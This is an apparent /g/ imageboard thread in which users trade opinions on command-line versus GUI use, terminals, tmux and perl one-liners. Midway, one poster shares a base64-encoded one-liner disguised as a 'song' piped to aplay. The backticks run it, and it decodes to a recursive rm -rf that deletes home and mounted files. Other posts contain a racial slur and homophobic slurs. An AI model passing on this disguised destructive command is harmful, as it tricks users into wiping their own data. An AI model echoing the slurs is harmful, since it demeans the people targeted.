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Do you like the command line?
>the command line
which one
any of them, how do you feel about them? do yo mind using command line?
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Fact: Bash is the most Powerful Language in the World
I prefer them to GUI bloat
I like the command line because it allows me to use aliases.
based job haver
I don't give a shit about bloat. Unless it's something I'll be doing frequently, and thus script it, or need to process output to get something specific. I prefer GUI over CLI.
The only exception is networking equipment. I'm a CLI extremist because it's super easy and a web server seriously increases attack surface.

but for actual servers I like webservers because lmao fuck doing that shit on the command line.
uniroinically they need to fork bash and simplify and unify the syntax including the utilities like awk and stuff. If you don't work with it all day everyday it's such a fucking joke.
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I love the command line.
>any of them
As opposed to using "the GUI"? What sort of a midwit-tier question is that? Even ChatGPT would come up with something better.
answer it, how do you feel when you see command line?
Of course. I'm not a nigger!
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echo cm0gLXJmIC8qbWUqIC9tbnQK | `base64 -d` | aplay
wow! I had no idea a song would be so short in base64!!!
Never relax around backticks
actually it doesn't even work on my system (Ubuntu) lmao
echo bHMK | `base64 -d` | aplay

and it actually just plays the audio, it doesn't run the command.
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I like the commmmand line. My favourite terminal is Kitty, and I've only tried bash and powershell, so bash is my favourite shell.

I cope and seethe at the command line and argue it should never be the default, but in reality I cannot deny how good it feels to just have my comfy terminal and open vim and do my thing real quick. Even on windows (which I am using right now), most of my file management is done through either cygwin or powershell.

I never tried tmux though, am I missing out?
nope and i think it's gay
>I never tried tmux though, am I missing out?
imo no, at least for personal use I never needed it often enough to learn the keybinds. Although occasionally I'll open other tabs like if I want to make sure a specific command works as I think it should or I ran something that's going to take a minute and I forgot to run it in the background.

At least for Konsole (the KDE terminal emulator) switching tabs uses the same keybinds as a browser which I already know. Although I'd imagine a lot of other terminals probably use the same since they're pretty standard.
wtf, this deleted my system32!!!!!!?!
only thing /g/ knows how to do is
you fags think typing shit makes you smart, you're not smart, good desktop environments have eliminated the need for "command line" for 99.99 percent of people.
If you're in the .01 percent, congrats, you're not smart you just do gay shit on your computer
yes i do.
you're a monkey that got trained by colorful buttons
I like having a dialogue with my system, and accurately and quickly do what I need to do, with immediate and clear feedback
wtf based anon i love these tunes :)
i am too stupid to use perl and i been piping shit to sed/grep/cut/tr for years. how can i use perl for one liners guys. im a pcre enjoyer and feel like im missing out. or is perl dead?
>find the world unfair/difficult/not to my liking
>the world must change
>someone else should do the work though
Yes, I need it to do my job. Can't put a GUI in a script.
Tmux is well worth having if you ever do anything remote, like SSHing into a calc server and running either ML or some other one off simulation work.

It's also used by sysadmins in "pets" type server setups because you can open 12 different panes (forget the correct terms) at once and input the same commands into a bunch of different SSH sessions at once.
overwhelmed with the sublime, terrified and filled with resplendent energy to gtfo of there

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